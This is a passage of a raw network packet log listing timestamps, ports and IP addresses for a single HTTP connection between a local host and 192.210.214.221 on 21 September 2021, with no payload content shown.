Sep 21, 2021 21:34:35.093969107 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093976021 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093988895 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094006062 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094022036 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094033003 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.094037056 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094053030 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094065905 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.094069004 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094084024 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094093084 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.094099998 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094115019 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.094119072 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094136953 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094149113 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.094151974 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094167948 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094183922 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.094183922 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094199896 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094212055 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094223976 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094235897 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.094238997 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094254971 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094266891 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094290972 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094299078 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.094305038 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.094305038 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094312906 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.094321012 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094336987 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.094340086 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.094372988 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.095066071 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.101690054 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.101723909 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.101747036 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.101768970 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.101769924 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.101790905 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.101792097 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.101823092 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.101844072 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.101861954 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.101869106 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.101891041 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.101892948 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.101916075 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.101933956 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.101937056 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.101958990 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.101970911 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.101979017 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102000952 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102015018 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102022886 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102046967 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102070093 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102087021 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102092028 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102113962 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102117062 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102135897 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102148056 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102158070 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102179050 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102200031 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102202892 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102224112 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102247000 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102267027 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102268934 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102292061 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102299929 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102317095 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102334023 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102339029 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102361917 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102382898 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102387905 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102408886 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102422953 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102432013 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102452993 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102464914 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102474928 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102497101 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102519035 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102540016 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102541924 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102564096 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102570057 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102588892 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102600098 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102612019 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102633953 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102654934 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102670908 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102675915 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102698088 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102699041 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102719069 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102729082 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102741003 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102765083 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102782011 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102787971 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102808952 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102829933 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102847099 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102852106 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102874041 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102875948 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102895021 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102906942 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102916002 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102941036 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102955103 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.102976084 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.102997065 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.103013992 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.103019953 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.103041887 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.103066921 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.126924038 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.126961946 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.127002001 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.150507927 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150546074 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150569916 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150577068 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.150593996 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150616884 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.150620937 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150648117 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150671005 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150687933 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.150693893 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150718927 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150722027 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.150743008 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150757074 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.150767088 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150790930 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150818110 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150830984 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.150841951 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150856018 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.150865078 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150888920 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150912046 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150928974 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.150933981 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150954008 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.150958061 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150981903 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.150998116 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.151009083 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.151032925 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.151046038 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.151056051 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.151078939 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.151093006 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.204097033 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.241919041 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.241957903 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.241980076 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242006063 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242026091 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242043018 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242062092 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242079973 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242105961 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242106915 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242129087 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242141008 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242151976 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242152929 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242176056 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242193937 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242217064 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242234945 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242239952 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242248058 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242264032 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242278099 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242286921 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242310047 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242331982 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242335081 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242353916 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242378950 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242386103 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242402077 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242425919 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242443085 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242450953 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242465973 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242469072 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242491961 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242516041 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242525101 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242538929 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242563009 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242566109 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242587090 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242604971 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242629051 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242630005 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242651939 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242660999 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242676020 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242688894 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242700100 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242723942 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242748022 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242767096 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242768049 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242791891 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242794991 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242815971 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242837906 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242846012 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242861986 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242891073 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242892027 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242917061 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242939949 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242961884 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242968082 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.242985010 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.242988110 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243009090 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243031979 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243036032 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243057013 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243079901 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243082047 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243107080 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243148088 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243149996 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243174076 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243191004 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243215084 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243232965 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243249893 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243257046 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243257999 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243279934 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243288994 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243304968 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243323088 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243336916 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243347883 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243370056 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243371010 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243393898 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243416071 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243439913 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243457079 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243463039 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243477106 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243489027 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243506908 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243513107 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243535042 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243551970 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243557930 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243578911 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243606091 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243613958 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243630886 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243654013 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243654013 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243676901 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243701935 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243724108 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243726015 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243746042 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243752956 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243767977 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243789911 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243794918 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243819952 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243837118 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243840933 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243863106 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243885040 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243902922 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243906975 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243928909 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243932962 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243952036 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.243962049 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.243978024 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244002104 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244024038 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244040966 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.244046926 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244067907 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.244070053 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244092941 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244115114 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244122028 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.244138002 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244162083 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.244163990 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244187117 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244209051 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.244210005 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244234085 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244249105 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.244256020 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244277954 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244307041 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244313955 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.244330883 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244350910 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.244350910 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244374037 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244383097 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.244396925 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244422913 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244436026 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.244446993 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244468927 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244492054 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244512081 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.244513988 CEST	80	49742	192.210.214.221	192.168.2.3
